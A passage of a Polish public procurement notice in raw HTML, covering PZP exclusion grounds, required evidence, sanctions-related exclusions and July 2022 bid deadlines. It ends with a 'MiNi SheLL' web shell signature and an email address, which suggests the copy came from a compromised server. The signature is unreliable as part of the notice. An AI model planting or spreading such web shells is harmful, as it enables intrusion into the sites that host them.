i 3 lub art. 10 ustawy z dnia 15 czerwca 2012<br/>r. o skutkach powierzania wykonywania pracy cudzoziemcom<br/>przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej,<br/>- lub za odpowiedni czyn zabroniony określony w przepisach prawa obcego;<br/>2) art. 108 ust. 1 pkt 2) PZP Zamawiający wykluczy Wykonawcę, jeżeli urzędującego<br/>członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce<br/>jawnej lub partnerskiej albo komplementariusza w spółce komandytowej lub<br/>komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo,<br/>o którym mowa w art. 108 ust. 1 pkt 1) PZP;<br/>3) art. 108 ust. 1 pkt 3) PZP Zamawiający wykluczy Wykonawcę, wobec którego<br/>wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną<br/>o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne<br/>lub zdrowotne, chyba że Wykonawca odpowiednio przed upływem terminu do<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed<br/>upływem terminu składania ofert dokonał płatności należnych podatków, opłat lub<br/>składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłaty tych należności;<br/>4) art. 108 ust. 1 pkt 4) PZP Zamawiający wykluczy Wykonawcę, wobec którego<br/>prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5) art. 108 ust. 1 pkt 5) PZP Zamawiający wykluczy Wykonawcę, jeżeli Zamawiający<br/>może stwierdzić, na podstawie wiarygodnych przesłanek, że Wykonawca zawarł<br/>z innymi wykonawcami porozumienie mające na celu zakłócenie konkurencji,<br/>w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu ustawy<br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne<br/>oferty, oferty częściowe lub wnioski o dopuszczenie do udziału w postępowaniu,<br/>chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie; 6) art. 108 ust. 1 pkt 6) PZP Zamawiający wykluczy Wykonawcę, jeżeli,<br/>w przypadkach, o których mowa w art. 85 ust. 1 PZP, doszło do zakłócenia<br/>konkurencji wynikającego z wcześniejszego zaangażowania tego wykonawcy lub<br/>podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn.<br/>Dz. U. z 2021 r. poz. 275 z późn. zm.), chyba że spowodowane tym zakłócenie<br/>konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie<br/>Wykonawcy z udziału w postępowaniu o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie niepodlegania wykluczeniu:<br/>a)oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania określonych w: a) art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP odnośnie do orzeczenia zakazu<br/>ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, c) art. 108 ust. 1<br/>pkt 5 PZP odnośnie do zawarcia z innymi wykonawcami porozumienia mającego na celu<br/>zakłócenie konkurencji, d) art. 109 ust.1 pkt.7 e) art. 108 ust. 1 pkt 6 PZP (wzór<br/>oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania stanowi<br/>załącznik nr 3a do SWZ)<br/>b) informację z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b)<br/>art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego,<br/>c) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r., poz. 275 z późn. zm.), z innym<br/>Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie<br/>o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy<br/>w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy<br/>kapitałowej stanowi załącznik nr 3 do SWZ),<br/>d) odpis lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie spełniania warunków udziału w postępowaniu:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie (wzór wykazu wykonanych robót budowlanych stanowi załącznik nr 9<br/>do SWZ),<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych,<br/>wykonanych wspólnie z innymi wykonawcami informacje, o których mowa wyżej dotyczą<br/>robót budowlanych faktycznie przez niego wykonanych, a w przypadku świadczeń<br/>powtarzających się lub ciągłych - również faktycznie przez niego wykonywanych.<br/>b) dowody, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie spełnienia<br/>warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie<br/>doświadczenia zostały wykonane lub są wykonywane należycie,<br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie Wykonawcy.<br/>c) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie robót budowlanych, wraz z informacjami<br/>na temat ich doświadczenia i wykształcenia niezbędnych do wykonania zamówienia<br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania (wzór wykazu osób skierowanych przez wykonawcę do<br/>realizacji zamówienia stanowi załącznik nr 8 do SWZ).<br/>d) wykaz urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (wzór wykazu<br/>urządzeń technicznych dostępnych wykonawcy do realizacji zamówienia stanowi załącznik<br/>nr 10 do SWZ).<br/>e)informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca<br/>wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,<br/>w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022<br/>r. (Dz. U. 2022 poz. 835) o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>1) Z postępowania o udzielenie zamówienia na podstawie ustawy z dnia 11 września 2019<br/>r. – Prawo zamówień publicznych wyklucza się również:<br/>a) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3;<br/>b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym<br/>w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest<br/>osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na<br/>listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej<br/>o zastosowaniu środka, o którym mowa w art. 1 pkt 3;<br/>c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą<br/>w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia29 września 1994 r.<br/>o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot<br/>wymieniony w wykazach określonych w rozporządzeniu 765/2006<br/>i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie<br/>decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka,<br/>o którym mowa w art. 1 pkt 3. 2) Wykluczenie następuje na okres trwania okoliczności określonych w pkt 1 powyżej.<br/>3) W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie pkt 1,<br/>zamawiający odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie<br/>zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika konkursu, nie<br/>zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty<br/>dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także<br/>nie prowadzi z takim wykonawcą negocjacji lub dialogu, odrzuca wniosek o dopuszczenie<br/>do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza<br/>oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia<br/>publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>4) Przez ubieganie się o udzielenie zamówienia publicznego lub dopuszczenie do udziału<br/>w konkursie rozumie się odpowiednio złożenie wniosku o dopuszczenie do udziału<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie, złożenie oferty,<br/>przystąpienie do negocjacji lub złożenie pracy konkursowej.<br/>- JAKO OŚWIADCZENIE NA ZAŁ.NR 2 DO SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1) każdy Wykonawca, w celu potwierdzenia, że nie podlega wykluczeniu oraz spełnia<br/>warunki udziału w postępowaniu, zobowiązany jest złożyć oddzielnie oświadczenia,<br/>o których mowa w pkt.7.1;<br/>2) należy złożyć oświadczenie dotyczące realizacji zakresu przedmiotu zamówienia<br/>przez poszczególnych Wykonawców – na lub zgodnie z zał. Nr 2a do SWZ.<br/>Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu<br/>z postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia warunki udziału w postępowaniu określone w pkt 6.6. powinni spełniać łącznie<br/>wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt 6.6. ppkt 4) lit. a) - c)<br/>SWZ powinien spełniać co najmniej jeden z tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres przewidywanych zmian do umowy określa paragraf § 11 wzoru umowy, stanowiacej załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-21 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy eZamawiający: https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-21 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com